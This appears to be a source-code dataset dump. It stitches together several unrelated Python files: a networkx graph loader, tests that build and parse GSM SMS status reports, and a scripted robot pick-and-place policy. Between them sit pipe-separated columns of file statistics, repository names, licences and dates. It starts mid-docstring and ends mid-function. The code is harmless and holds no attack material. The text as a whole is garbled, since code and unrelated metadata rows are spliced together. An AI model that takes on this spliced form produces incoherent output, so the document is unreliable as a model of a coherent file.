    :var Optional[int] next_record_position:
    :var Optional[str] set_id:
    :var Optional[Iterable[Item]] items:

    Example::

        GetAvailabilityInfoResponse(status='OK',
                                    message='Operation completed successfully',
                                    error_message=None,
                                    next_record_position=2,
                                    set_id='3709',
                                    items=(Item(item_no='B33315114J', ...),
                                           Item(item_no='B33315118C', ...)))
    """
    status: str
    message: str
    error_message: Optional[str]
    next_record_position: Optional[int]
    set_id: Optional[str]
    items: Optional[Iterable[Item]]
| 37.635015
| 1,029
| 0.65986
| 1,681
| 12,683
| 4.869126
| 0.149911
| 0.043006
| 0.005864
| 0.010996
| 0.759438
| 0.748076
| 0.731338
| 0.72474
| 0.719609
| 0.667929
| 0
| 0.025924
| 0.257904
| 12,683
| 336
| 1,030
| 37.747024
| 0.843391
| 0.865568
| 0
| 0.42029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.028986
| 0
| 0.913043
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
8a92aad089f81a1f86bc9e982d4f8c6b9bd9932a
| 2,903
|
py
|
Python
|
visualization/GraphUtil.py
|
4jinetes/BSF
|
86d477b1aca8a95be58f9608c6da375d3946be53
|
[
"MIT"
] | 67
|
2019-09-20T09:38:17.000Z
|
2022-03-19T13:05:54.000Z
|
visualization/GraphUtil.py
|
4jinetes/BSF
|
86d477b1aca8a95be58f9608c6da375d3946be53
|
[
"MIT"
] | null | null | null |
visualization/GraphUtil.py
|
4jinetes/BSF
|
86d477b1aca8a95be58f9608c6da375d3946be53
|
[
"MIT"
] | 30
|
2019-09-29T02:09:09.000Z
|
2021-12-27T02:18:11.000Z
|
import networkx as nx
import os
import re
#def init_graph(SOURCE_FILE, FILE_RESET=False):
# if os.path.isfile(SOURCE_FILE):
# print "File is read."
# G = nx.read_dot(SOURCE_FILE)
# else:
# print "Error! The specified source file does not exist."
# quit()
# print "Your Graph contains " + str(len(G.nodes())) + " nodes and " + str(len(G.edges())) + " edges."
# return G
def init_graph(SOURCE_FILE, FILE_RESET=False):
    """Parse a '"<n>"->{"a" "b" ...}' adjacency dump into an nx.DiGraph.

    :param SOURCE_FILE: path to the adjacency dump
    :param FILE_RESET: unused; kept for interface compatibility
    :return: the populated directed graph

    Exits the interpreter (quit()) if SOURCE_FILE does not exist, matching
    the historical behaviour of this module.
    """
    if os.path.isfile(SOURCE_FILE):
        print("File is read.")
        exp = re.compile(r'\"(\d+)\"->{(.*)}')
        G = nx.DiGraph()
        # Context manager guarantees the handle is closed even if parsing
        # raises (the original left the file open on error).
        with open(SOURCE_FILE, 'r') as f:
            for line in f:
                res = exp.match(line)
                if res:
                    n = res.group(1)
                    neighbors = res.group(2).replace('\"', "").split(" ")
                    for neighbor in neighbors:
                        if neighbor != '':
                            G.add_edge(int(n), int(neighbor))
    else:
        print("Error! The specified source file does not exist.")
        quit()
    print("Your Graph contains " + str(len(G.nodes())) + " nodes and " + str(len(G.edges())) + " edges.")
    return G
def init_multidigraph(SOURCE_FILE, FILE_RESET=False):
    """Parse a '"<n>"->{"a" "b" ...}' adjacency dump into an nx.MultiDiGraph.

    Identical to init_graph() except that parallel edges are preserved
    (MultiDiGraph instead of DiGraph).

    :param SOURCE_FILE: path to the adjacency dump
    :param FILE_RESET: unused; kept for interface compatibility
    :return: the populated multi-directed graph
    """
    if os.path.isfile(SOURCE_FILE):
        print("File is read.")
        exp = re.compile(r'\"(\d+)\"->{(.*)}')
        G = nx.MultiDiGraph()
        # Context manager guarantees the handle is closed even if parsing
        # raises (the original left the file open on error).
        with open(SOURCE_FILE, 'r') as f:
            for line in f:
                res = exp.match(line)
                if res:
                    n = res.group(1)
                    neighbors = res.group(2).replace('\"', "").split(" ")
                    for neighbor in neighbors:
                        if neighbor != '':
                            G.add_edge(int(n), int(neighbor))
    else:
        print("Error! The specified source file does not exist.")
        quit()
    print("Your Graph contains " + str(len(G.nodes())) + " nodes and " + str(len(G.edges())) + " edges.")
    return G
def init_graph_clean(SOURCE_FILE, FILE_RESET=False, Verbose = False):
    """Parse the adjacency dump like init_graph(), then drop sink nodes.

    After loading, every node with out-degree 0 is removed (single pass —
    nodes that *become* sinks through the removal are kept, as before).

    :param SOURCE_FILE: path to the adjacency dump
    :param FILE_RESET: unused; kept for interface compatibility
    :param Verbose: when True, print the same diagnostics as init_graph()
    :return: the cleaned directed graph
    """
    if os.path.isfile(SOURCE_FILE):
        if Verbose:
            print("File is read.")
        exp = re.compile(r'\"(\d+)\"->{(.*)}')
        G = nx.DiGraph()
        # Context manager guarantees the handle is closed even if parsing
        # raises (the original left the file open on error).
        with open(SOURCE_FILE, 'r') as f:
            for line in f:
                res = exp.match(line)
                if res:
                    n = res.group(1)
                    neighbors = res.group(2).replace('\"', "").split(" ")
                    for neighbor in neighbors:
                        if not neighbor == '':
                            G.add_edge(int(n), int(neighbor))
    else:
        print("Error! The specified source file does not exist.")
        quit()
    if Verbose:
        print("Your Graph contains " + str(len(G.nodes())) + " nodes and " + str(len(G.edges())) + " edges.")
    # Snapshot the node list first: removing nodes while iterating the live
    # NodeView raises "dictionary changed size" RuntimeError on networkx >= 2.
    for node in list(G.nodes()):
        if G.out_degree(node) == 0:
            G.remove_node(node)
    return G
| 33.367816
| 109
| 0.503961
| 365
| 2,903
| 3.934247
| 0.189041
| 0.111421
| 0.038997
| 0.052925
| 0.885097
| 0.868384
| 0.868384
| 0.848189
| 0.848189
| 0.848189
| 0
| 0.003636
| 0.336893
| 2,903
| 86
| 110
| 33.755814
| 0.742338
| 0.12022
| 0
| 0.838235
| 0
| 0
| 0.141454
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044118
| false
| 0
| 0.044118
| 0
| 0.132353
| 0.132353
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8aa6abfe2adef69059ebfdbc8644b6f20310412d
| 20,420
|
py
|
Python
|
tests/test_sms/test_sms_status_report.py
|
matan1008/gsm-layer3-protocol
|
6e5cff082b2726e8cd7065f34badea527a720a6b
|
[
"MIT"
] | null | null | null |
tests/test_sms/test_sms_status_report.py
|
matan1008/gsm-layer3-protocol
|
6e5cff082b2726e8cd7065f34badea527a720a6b
|
[
"MIT"
] | null | null | null |
tests/test_sms/test_sms_status_report.py
|
matan1008/gsm-layer3-protocol
|
6e5cff082b2726e8cd7065f34badea527a720a6b
|
[
"MIT"
] | null | null | null |
from gsm_layer3_protocol import parse, build
from gsm_layer3_protocol.enums import *
from gsm_layer3_protocol.l3_message import L3Message
from gsm_layer3_protocol.sms_protocol.cp_data import CpData
from gsm_layer3_protocol.sms_protocol.rp_data import RpDataNToMs
from gsm_layer3_protocol.sms_protocol.sms_status_report import SmsStatusReport
from gsm_layer3_protocol.enums import bcd_number_plan as plan, \
bcd_type_of_number as number_type
from gsm_layer3_protocol.sms_protocol.called_party_bcd_address import \
AddressField
from gsm_layer3_protocol.sms_protocol.tp_user_data import TpUserData, \
TpUserDataHeader, TpUserDataHeaderElement
from gsm_layer3_protocol.sms_protocol.tpdu_parameters import TpScts, \
TpDcsGeneralDataCodingIndicationNoMessageClass, TpDt
def test_building_sms_status_report_with_data_header():
    """Build an SMS-STATUS-REPORT that carries a TP user-data header
    (concatenated-short-messages IE) and check the exact serialized bytes."""
    sms_status_report = SmsStatusReport(
        tp_srq.SMS_SUBMIT,
        tp_lp.NOT_FORWARDED_OR_SPAWNED,
        tp_mms.NO_MORE_MESSAGES_ARE_WAITING,
        0xcc,  # TP-MR: message reference of the SMS this report refers to
        AddressField(
            number_type.INTERNATIONAL_NUMBER,
            plan.UNKNOWN,
            "*3639"
        ),
        TpScts(18, 9, 1, 23, 6, 0, 2),  # service-centre timestamp
        TpDt(18, 9, 1, 23, 0, 0, 2),  # discharge time
        tp_st.SHORT_MESSAGE_RECEIVED_BY_THE_SME,
        tp_pid.DEFAULT,
        TpDcsGeneralDataCodingIndicationNoMessageClass(),
        TpUserData(
            "Deliver us!",
            TpUserDataHeader(TpUserDataHeaderElement(
                tp_udh_elements.CONCATENATED_SHORT_MESSAGES_8_BIT,
                b"\x03\x02\x01"
            ))
        )
    )
    # Wrap the TPDU in CP-DATA / RP-DATA (network -> MS) and compare against
    # the expected on-the-wire encoding.
    assert build(L3Message(
        3,
        protocol_discriminator.SMS,
        CpData(rp_mti.RP_DATA_N_TO_MS, RpDataNToMs(
            1,
            AddressField(
                number_type.INTERNATIONAL_NUMBER,
                plan.UNKNOWN,
                "123456"
            ),
            sms_status_report
        ))
    )) == (b"\x39\x01\x33\x01\x01\x04\x90\x21\x43\x65\x00\x2a\x46\xcc\x05\x90"
           b"\x3a\x36\xf9\x81\x90\x10\x32\x60\x00\x80\x81\x90\x10\x32\x00\x00"
           b"\x80\x00\x07\x00\x00\x12\x05\x00\x03\x03\x02\x01\x88\x65\x76\xda"
           b"\x5e\x96\x83\xea\xf3\x10")
def test_parsing_sms_status_report_with_data_header():
    """Parse the frame built in the companion building test and verify the
    full decoded tree, including tp_udhi=True and the decoded user-data
    header element."""
    assert parse(b"\x39\x01\x33\x01\x01\x04\x90\x21\x43\x65\x00\x2a\x46\xcc"
                 b"\x05\x90\x3a\x36\xf9\x81\x90\x10\x32\x60\x00\x80\x81\x90"
                 b"\x10\x32\x00\x00\x80\x00\x07\x00\x00\x12\x05\x00\x03\x03"
                 b"\x02\x01\x88\x65\x76\xda\x5e\x96\x83\xea\xf3\x10") == {
        "transaction_identifier": 3,
        "protocol_discriminator": protocol_discriminator.SMS,
        "l3_protocol": {
            "message_type": message_type.CP_DATA,
            "cp_layer_protocol": {
                "spare": None,
                "mti": rp_mti.RP_DATA_N_TO_MS,
                "rp": {
                    "message_reference": 1,
                    "rp_originator_address": {
                        "ext": None,
                        "number": "123456",
                        "number_plan": plan.UNKNOWN,
                        "type_of_number": number_type.INTERNATIONAL_NUMBER
                    },
                    "rp_destination_address": 0,
                    "rp_user_data": {"tpdu": {
                        # Header present, so tp_udhi is set.
                        "tp_udhi": True,
                        "tp_srq": tp_srq.SMS_SUBMIT,
                        "tp_lp": tp_lp.NOT_FORWARDED_OR_SPAWNED,
                        "tp_mms": tp_mms.NO_MORE_MESSAGES_ARE_WAITING,
                        "tp_mti": tp_mti.SMS_STATUS_OR_COMMAND,
                        "tp_mr": 0xcc,
                        "tp_ra": {
                            "ext": None,
                            "number": "*3639",
                            "number_plan": plan.UNKNOWN,
                            "type_of_number": number_type.INTERNATIONAL_NUMBER
                        },
                        "tp_scts": {
                            "day": 1,
                            "gmt": 2.0,
                            "hour": 23,
                            "minute": 6,
                            "month": 9,
                            "second": 0,
                            "year": 18
                        },
                        "tp_dt": {
                            "day": 1,
                            "gmt": 2.0,
                            "hour": 23,
                            "minute": 0,
                            "month": 9,
                            "second": 0,
                            "year": 18
                        },
                        "tp_st": tp_st.SHORT_MESSAGE_RECEIVED_BY_THE_SME,
                        # TP-PI flags: all three optional parameters present.
                        "tp_pi": {
                            "tp_udl": True,
                            "tp_dcs": True,
                            "tp_pid": True,
                        },
                        "tp_pid": tp_pid.DEFAULT,
                        "tp_dcs": {
                            "coding_group": dcs_coding_groups.GENERAL_DATA_CODING_INDICATION,
                            "character_set": dcs_character_set.GSM_7,
                        },
                        "tp_ud": {
                            "user_data_header": [
                                {
                                    "element_type": tp_udh_elements.CONCATENATED_SHORT_MESSAGES_8_BIT,
                                    "element_data": b"\x03\x02\x01"
                                }
                            ],
                            "user_data": "Deliver us!"
                        }
                    }}
                }
            }
        }
    }
def test_building_sms_status_report_without_data_header():
    """Build an SMS-STATUS-REPORT whose TP-UD has no user-data header and
    check the serialized CP-DATA frame byte-for-byte."""
    sms_status_report = SmsStatusReport(
        tp_srq.SMS_SUBMIT,
        tp_lp.NOT_FORWARDED_OR_SPAWNED,
        tp_mms.NO_MORE_MESSAGES_ARE_WAITING,
        0xcc,  # TP-MR (message reference)
        AddressField(
            number_type.INTERNATIONAL_NUMBER,
            plan.UNKNOWN,
            "*3639"
        ),
        TpScts(18, 9, 1, 23, 6, 0, 2),
        TpDt(18, 9, 1, 23, 0, 0, 2),
        tp_st.SHORT_MESSAGE_RECEIVED_BY_THE_SME,
        tp_pid.DEFAULT,
        TpDcsGeneralDataCodingIndicationNoMessageClass(),
        TpUserData(
            "Deliver us!"
        )
    )
    assert build(L3Message(
        3,
        protocol_discriminator.SMS,
        CpData(rp_mti.RP_DATA_N_TO_MS, RpDataNToMs(
            1,
            AddressField(
                number_type.INTERNATIONAL_NUMBER,
                plan.UNKNOWN,
                "123456"
            ),
            sms_status_report
        ))
    )) == (b"\x39\x01\x2d\x01\x01\x04\x90\x21\x43\x65\x00\x24\x06\xcc\x05\x90"
           b"\x3a\x36\xf9\x81\x90\x10\x32\x60\x00\x80\x81\x90\x10\x32\x00\x00"
           b"\x80\x00\x07\x00\x00\x0b\xc4\x32\x3b\x6d\x2f\xcb\x41\xf5\x79\x08")
def test_parsing_sms_status_report_without_data_header():
    """Parse an SMS-STATUS-REPORT frame without a user-data header and
    verify the decoded tree (tp_udhi=False, user_data_header=None)."""
    assert parse(b"\x39\x01\x2d\x01\x01\x04\x90\x21\x43\x65\x00\x24\x06\xcc"
                 b"\x05\x90\x3a\x36\xf9\x81\x90\x10\x32\x60\x00\x80\x81\x90"
                 b"\x10\x32\x00\x00\x80\x00\x07\x00\x00\x0b\xc4\x32\x3b\x6d"
                 b"\x2f\xcb\x41\xf5\x79\x08") == {
        "transaction_identifier": 3,
        "protocol_discriminator": protocol_discriminator.SMS,
        "l3_protocol": {
            "message_type": message_type.CP_DATA,
            "cp_layer_protocol": {
                "spare": None,
                "mti": rp_mti.RP_DATA_N_TO_MS,
                "rp": {
                    "message_reference": 1,
                    "rp_originator_address": {
                        "ext": None,
                        "number": "123456",
                        "number_plan": plan.UNKNOWN,
                        "type_of_number": number_type.INTERNATIONAL_NUMBER
                    },
                    "rp_destination_address": 0,
                    "rp_user_data": {"tpdu": {
                        # No header in TP-UD, so tp_udhi is clear.
                        "tp_udhi": False,
                        "tp_srq": tp_srq.SMS_SUBMIT,
                        "tp_lp": tp_lp.NOT_FORWARDED_OR_SPAWNED,
                        "tp_mms": tp_mms.NO_MORE_MESSAGES_ARE_WAITING,
                        "tp_mti": tp_mti.SMS_STATUS_OR_COMMAND,
                        "tp_mr": 0xcc,
                        "tp_ra": {
                            "ext": None,
                            "number": "*3639",
                            "number_plan": plan.UNKNOWN,
                            "type_of_number": number_type.INTERNATIONAL_NUMBER
                        },
                        "tp_scts": {
                            "day": 1,
                            "gmt": 2.0,
                            "hour": 23,
                            "minute": 6,
                            "month": 9,
                            "second": 0,
                            "year": 18
                        },
                        "tp_dt": {
                            "day": 1,
                            "gmt": 2.0,
                            "hour": 23,
                            "minute": 0,
                            "month": 9,
                            "second": 0,
                            "year": 18
                        },
                        "tp_st": tp_st.SHORT_MESSAGE_RECEIVED_BY_THE_SME,
                        "tp_pi": {
                            "tp_udl": True,
                            "tp_dcs": True,
                            "tp_pid": True,
                        },
                        "tp_pid": tp_pid.DEFAULT,
                        "tp_dcs": {
                            "coding_group": dcs_coding_groups.GENERAL_DATA_CODING_INDICATION,
                            "character_set": dcs_character_set.GSM_7,
                        },
                        "tp_ud": {
                            "user_data_header": None,
                            "user_data": "Deliver us!"
                        }
                    }}
                }
            }
        }
    }
def test_building_sms_status_report_without_dcs():
    """Build an SMS-STATUS-REPORT that omits TP-DCS (tp_pid and tp_ud passed
    by keyword so the dcs slot stays empty) and check the resulting bytes."""
    sms_status_report = SmsStatusReport(
        tp_srq.SMS_SUBMIT,
        tp_lp.NOT_FORWARDED_OR_SPAWNED,
        tp_mms.NO_MORE_MESSAGES_ARE_WAITING,
        0xcc,  # TP-MR (message reference)
        AddressField(
            number_type.INTERNATIONAL_NUMBER,
            plan.UNKNOWN,
            "*3639"
        ),
        TpScts(18, 9, 1, 23, 6, 0, 2),
        TpDt(18, 9, 1, 23, 0, 0, 2),
        tp_st.SHORT_MESSAGE_RECEIVED_BY_THE_SME,
        tp_pid=tp_pid.DEFAULT,
        tp_ud=TpUserData(
            "Deliver us!",
            TpUserDataHeader(TpUserDataHeaderElement(
                tp_udh_elements.CONCATENATED_SHORT_MESSAGES_8_BIT,
                b"\x03\x02\x01"
            ))
        )
    )
    assert build(L3Message(
        3,
        protocol_discriminator.SMS,
        CpData(rp_mti.RP_DATA_N_TO_MS, RpDataNToMs(
            1,
            AddressField(
                number_type.INTERNATIONAL_NUMBER,
                plan.UNKNOWN,
                "123456"
            ),
            sms_status_report
        ))
    )) == (b"\x39\x01\x32\x01\x01\x04\x90\x21\x43\x65\x00\x29\x46\xcc\x05\x90"
           b"\x3a\x36\xf9\x81\x90\x10\x32\x60\x00\x80\x81\x90\x10\x32\x00\x00"
           b"\x80\x00\x05\x00\x12\x05\x00\x03\x03\x02\x01\x88\x65\x76\xda\x5e"
           b"\x96\x83\xea\xf3\x10")
def test_parsing_sms_status_report_without_dcs():
    """Parse an SMS-STATUS-REPORT frame whose TP-PI marks TP-DCS as absent
    and verify the decoder falls back to a GSM_7 character set entry."""
    assert parse(b"\x39\x01\x32\x01\x01\x04\x90\x21\x43\x65\x00\x29\x46\xcc"
                 b"\x05\x90\x3a\x36\xf9\x81\x90\x10\x32\x60\x00\x80\x81\x90"
                 b"\x10\x32\x00\x00\x80\x00\x05\x00\x12\x05\x00\x03\x03\x02"
                 b"\x01\x88\x65\x76\xda\x5e\x96\x83\xea\xf3\x10") == {
        "transaction_identifier": 3,
        "protocol_discriminator": protocol_discriminator.SMS,
        "l3_protocol": {
            "message_type": message_type.CP_DATA,
            "cp_layer_protocol": {
                "spare": None,
                "mti": rp_mti.RP_DATA_N_TO_MS,
                "rp": {
                    "message_reference": 1,
                    "rp_originator_address": {
                        "ext": None,
                        "number": "123456",
                        "number_plan": plan.UNKNOWN,
                        "type_of_number": number_type.INTERNATIONAL_NUMBER
                    },
                    "rp_destination_address": 0,
                    "rp_user_data": {"tpdu": {
                        "tp_udhi": True,
                        "tp_srq": tp_srq.SMS_SUBMIT,
                        "tp_lp": tp_lp.NOT_FORWARDED_OR_SPAWNED,
                        "tp_mms": tp_mms.NO_MORE_MESSAGES_ARE_WAITING,
                        "tp_mti": tp_mti.SMS_STATUS_OR_COMMAND,
                        "tp_mr": 0xcc,
                        "tp_ra": {
                            "ext": None,
                            "number": "*3639",
                            "number_plan": plan.UNKNOWN,
                            "type_of_number": number_type.INTERNATIONAL_NUMBER
                        },
                        "tp_scts": {
                            "day": 1,
                            "gmt": 2.0,
                            "hour": 23,
                            "minute": 6,
                            "month": 9,
                            "second": 0,
                            "year": 18
                        },
                        "tp_dt": {
                            "day": 1,
                            "gmt": 2.0,
                            "hour": 23,
                            "minute": 0,
                            "month": 9,
                            "second": 0,
                            "year": 18
                        },
                        "tp_st": tp_st.SHORT_MESSAGE_RECEIVED_BY_THE_SME,
                        # TP-PI: dcs flag clear — TP-DCS not on the wire.
                        "tp_pi": {
                            "tp_udl": True,
                            "tp_dcs": False,
                            "tp_pid": True,
                        },
                        "tp_pid": tp_pid.DEFAULT,
                        # Default character set when TP-DCS is absent.
                        "tp_dcs": {
                            "character_set": dcs_character_set.GSM_7,
                        },
                        "tp_ud": {
                            "user_data_header": [
                                {
                                    "element_type": tp_udh_elements.CONCATENATED_SHORT_MESSAGES_8_BIT,
                                    "element_data": b"\x03\x02\x01"
                                }
                            ],
                            "user_data": "Deliver us!"
                        }
                    }}
                }
            }
        }
    }
def test_building_sms_status_report_without_optionals():
    """Build an SMS-STATUS-REPORT with no optional TPDU parameters at all
    (no TP-PID, TP-DCS, or TP-UD) and check the serialized bytes."""
    sms_status_report = SmsStatusReport(
        tp_srq.SMS_SUBMIT,
        tp_lp.NOT_FORWARDED_OR_SPAWNED,
        tp_mms.NO_MORE_MESSAGES_ARE_WAITING,
        0xcc,  # TP-MR (message reference)
        AddressField(
            number_type.INTERNATIONAL_NUMBER,
            plan.UNKNOWN,
            "*3639"
        ),
        TpScts(18, 9, 1, 23, 6, 0, 2),
        TpDt(18, 9, 1, 23, 0, 0, 2),
        tp_st.SHORT_MESSAGE_RECEIVED_BY_THE_SME
    )
    assert build(L3Message(
        3,
        protocol_discriminator.SMS,
        CpData(rp_mti.RP_DATA_N_TO_MS, RpDataNToMs(
            1,
            AddressField(
                number_type.INTERNATIONAL_NUMBER,
                plan.UNKNOWN,
                "123456"
            ),
            sms_status_report
        ))
    )) == (b"\x39\x01\x20\x01\x01\x04\x90\x21\x43\x65\x00\x17\x06\xcc\x05\x90"
           b"\x3a\x36\xf9\x81\x90\x10\x32\x60\x00\x80\x81\x90\x10\x32\x00\x00"
           b"\x80\x00\x00")
def test_parsing_sms_status_report_without_optionals():
    """Parse an SMS-STATUS-REPORT with an all-zero TP-PI and verify that
    tp_pid and tp_ud come back as None."""
    assert parse(b"\x39\x01\x20\x01\x01\x04\x90\x21\x43\x65\x00\x17\x06\xcc"
                 b"\x05\x90\x3a\x36\xf9\x81\x90\x10\x32\x60\x00\x80\x81\x90"
                 b"\x10\x32\x00\x00\x80\x00\x00") == {
        "transaction_identifier": 3,
        "protocol_discriminator": protocol_discriminator.SMS,
        "l3_protocol": {
            "message_type": message_type.CP_DATA,
            "cp_layer_protocol": {
                "spare": None,
                "mti": rp_mti.RP_DATA_N_TO_MS,
                "rp": {
                    "message_reference": 1,
                    "rp_originator_address": {
                        "ext": None,
                        "number": "123456",
                        "number_plan": plan.UNKNOWN,
                        "type_of_number": number_type.INTERNATIONAL_NUMBER
                    },
                    "rp_destination_address": 0,
                    "rp_user_data": {"tpdu": {
                        "tp_udhi": False,
                        "tp_srq": tp_srq.SMS_SUBMIT,
                        "tp_lp": tp_lp.NOT_FORWARDED_OR_SPAWNED,
                        "tp_mms": tp_mms.NO_MORE_MESSAGES_ARE_WAITING,
                        "tp_mti": tp_mti.SMS_STATUS_OR_COMMAND,
                        "tp_mr": 0xcc,
                        "tp_ra": {
                            "ext": None,
                            "number": "*3639",
                            "number_plan": plan.UNKNOWN,
                            "type_of_number": number_type.INTERNATIONAL_NUMBER
                        },
                        "tp_scts": {
                            "day": 1,
                            "gmt": 2.0,
                            "hour": 23,
                            "minute": 6,
                            "month": 9,
                            "second": 0,
                            "year": 18
                        },
                        "tp_dt": {
                            "day": 1,
                            "gmt": 2.0,
                            "hour": 23,
                            "minute": 0,
                            "month": 9,
                            "second": 0,
                            "year": 18
                        },
                        "tp_st": tp_st.SHORT_MESSAGE_RECEIVED_BY_THE_SME,
                        # TP-PI: nothing optional on the wire.
                        "tp_pi": {
                            "tp_udl": False,
                            "tp_dcs": False,
                            "tp_pid": False,
                        },
                        "tp_pid": None,
                        "tp_dcs": {
                            "character_set": dcs_character_set.GSM_7,
                        },
                        "tp_ud": None
                    }}
                }
            }
        }
    }
| 43.72591
| 109
| 0.386729
| 1,779
| 20,420
| 4.11973
| 0.102305
| 0.025788
| 0.034793
| 0.06331
| 0.942011
| 0.933006
| 0.88566
| 0.868331
| 0.868331
| 0.868331
| 0
| 0.101757
| 0.520666
| 20,420
| 466
| 110
| 43.819742
| 0.647017
| 0
| 0
| 0.764444
| 0
| 0.053333
| 0.171841
| 0.089912
| 0
| 0
| 0.001567
| 0
| 0.017778
| 1
| 0.017778
| false
| 0
| 0.022222
| 0
| 0.04
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8aad139e3c89ef75f7fd43231e896d072d6199a6
| 18,843
|
py
|
Python
|
roboverse/policies/pick_place.py
|
VentusYue/roboverse
|
bd19e0ef7bdcae1198aa768bfe9fc18c51878b6d
|
[
"MIT"
] | null | null | null |
roboverse/policies/pick_place.py
|
VentusYue/roboverse
|
bd19e0ef7bdcae1198aa768bfe9fc18c51878b6d
|
[
"MIT"
] | null | null | null |
roboverse/policies/pick_place.py
|
VentusYue/roboverse
|
bd19e0ef7bdcae1198aa768bfe9fc18c51878b6d
|
[
"MIT"
] | null | null | null |
import numpy as np
import roboverse.bullet as bullet
from roboverse.assets.shapenet_object_lists import GRASP_OFFSETS
from .drawer_open_transfer import DrawerOpenTransfer
from roboverse.utils.general_utils import alpha_between_vec
class PickPlace:
    """Scripted pick-and-place policy: grasp a randomly chosen object and
    drop it into the environment's container.

    ``get_action()`` returns an 8-dim action (xyz delta, angle delta,
    gripper command, neutral action) plus an info dict.
    """

    def __init__(self, env, pick_height_thresh=-0.31, xyz_action_scale=7.0,
                 pick_point_noise=0.00, drop_point_noise=0.00):
        self.env = env
        # Per-instance jitter on the lift-success threshold.
        self.pick_height_thresh_noisy = (
            pick_height_thresh + np.random.normal(scale=0.01))
        self.xyz_action_scale = xyz_action_scale
        self.pick_point_noise = pick_point_noise
        self.drop_point_noise = drop_point_noise
        self.reset()

    def reset(self):
        """Pick a new target object and recompute pick/drop points."""
        # self.dist_thresh = 0.06 + np.random.normal(scale=0.01)
        self.object_to_target = self.env.object_names[
            np.random.randint(self.env.num_objects)]
        self.pick_point = bullet.get_object_position(
            self.env.objects[self.object_to_target])[0]
        if self.object_to_target in GRASP_OFFSETS.keys():
            self.pick_point += np.asarray(GRASP_OFFSETS[self.object_to_target])
        self.pick_point[2] = -0.32
        # BUGFIX: copy the container position before mutating its z entry.
        # The original aliased self.env.container_position and clobbered it
        # in place; PickPlaceTarget already guards the same access with
        # list(...), so do the same here for consistency.
        self.drop_point = list(self.env.container_position)
        self.drop_point[2] = -0.32
        self.place_attempted = False

    def get_action(self):
        """Return (action, agent_info) for the current state.

        The branches form a simple state machine: approach, grasp, lift,
        move over container, drop, then hold still.
        """
        ee_pos, _ = bullet.get_link_state(
            self.env.robot_id, self.env.end_effector_index)
        object_pos, _ = bullet.get_object_position(
            self.env.objects[self.object_to_target])
        object_lifted = object_pos[2] > self.pick_height_thresh_noisy
        gripper_pickpoint_dist = np.linalg.norm(self.pick_point - ee_pos)
        gripper_droppoint_dist = np.linalg.norm(self.drop_point - ee_pos)
        done = False
        if self.place_attempted:
            # Avoid picking and placing the object again after one attempt.
            action_xyz = [0., 0., 0.]
            action_angles = [0., 0., 0.]
            action_gripper = [0.]
        elif gripper_pickpoint_dist > 0.02 and self.env.is_gripper_open:
            # Move near the object; stay level until roughly above it.
            action_xyz = (self.pick_point - ee_pos) * self.xyz_action_scale
            xy_diff = np.linalg.norm(action_xyz[:2] / self.xyz_action_scale)
            if xy_diff > 0.03:
                action_xyz[2] = 0.0
            action_angles = [0., 0., 0.]
            action_gripper = [0.0]
        elif self.env.is_gripper_open:
            # Near enough: close the gripper to grasp.
            action_xyz = (self.pick_point - ee_pos) * self.xyz_action_scale
            action_angles = [0., 0., 0.]
            action_gripper = [-0.8]
        elif not object_lifted:
            # Lift the object above the height threshold.
            action_xyz = (self.env.ee_pos_init - ee_pos) * self.xyz_action_scale
            action_angles = [0., 0., 0.]
            action_gripper = [0.]
        elif gripper_droppoint_dist > 0.02:
            # Lifted; move towards the container.
            action_xyz = (self.drop_point - ee_pos) * self.xyz_action_scale
            action_angles = [0., 0., 0.]
            action_gripper = [0.]
        else:
            # Above the container: open the gripper to drop the object.
            # (List instead of the original tuple, for consistency with the
            # other branches; np.concatenate accepts either.)
            action_xyz = [0., 0., 0.]
            action_angles = [0., 0., 0.]
            action_gripper = [0.7]
            self.place_attempted = True

        agent_info = dict(place_attempted=self.place_attempted, done=done)
        neutral_action = [0.]
        action = np.concatenate(
            (action_xyz, action_angles, action_gripper, neutral_action))
        return action, agent_info
class PickPlaceOpen:
    """Pick up the blocking object, place it on the tray, then delegate to
    DrawerOpenTransfer to open the drawer.

    With suboptimal=True, half of the resets perturb the drop point so the
    demonstration is deliberately imperfect.
    """

    def __init__(self, env, pick_height_thresh=-0.31, xyz_action_scale=7.0,
                 pick_point_z=-0.32, suboptimal=False):
        self.env = env
        # Per-instance jitter on the lift-success threshold.
        self.pick_height_thresh_noisy = (
            pick_height_thresh + np.random.normal(scale=0.01))
        self.xyz_action_scale = xyz_action_scale
        self.pick_point_z = pick_point_z
        self.suboptimal = suboptimal
        self.drawer_policy = DrawerOpenTransfer(env, suboptimal=self.suboptimal)
        self.reset()

    def reset(self):
        """Recompute pick/drop points and reset the nested drawer policy."""
        # NOTE(review): pick_point/drop_point come straight from bullet and
        # are mutated below — assumes get_object_position returns a fresh
        # mutable copy; confirm against the bullet wrapper.
        self.pick_point = bullet.get_object_position(self.env.blocking_object)[0]
        self.pick_point[2] = self.pick_point_z
        self.drop_point = bullet.get_object_position(self.env.tray_id)[0]
        self.drop_point[2] = -0.2
        if self.suboptimal and np.random.uniform() > 0.5:
            # Half the time, shift the drop point to make the demo suboptimal.
            self.drop_point[0] += np.random.uniform(-0.2, 0.0)
            self.drop_point[1] += np.random.uniform(0.0, 0.2)
        self.place_attempted = False
        self.neutral_taken = False
        self.drawer_policy.reset()

    def get_action(self):
        """Return (action, agent_info).

        Phases: approach → grasp → lift → carry to tray → drop → take the
        neutral action once → run the drawer-opening policy to completion.
        """
